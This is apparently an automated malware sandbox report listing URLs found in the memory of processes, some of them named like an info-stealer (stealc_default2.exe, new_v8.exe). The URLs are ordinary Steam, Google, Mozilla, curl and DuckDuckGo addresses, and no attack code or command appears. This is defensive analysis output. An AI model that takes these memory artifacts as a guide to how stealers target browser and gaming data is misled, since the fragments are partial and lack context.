Source: chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx&
Source: chrome.exe, 0000002B.00000002.2704121158.00002B3C000AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/cx
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloW
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic"HELP_BASE_URL":"https:
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=uDUW
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=2UcHUv7TDL_s&amp
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/log
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/R
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
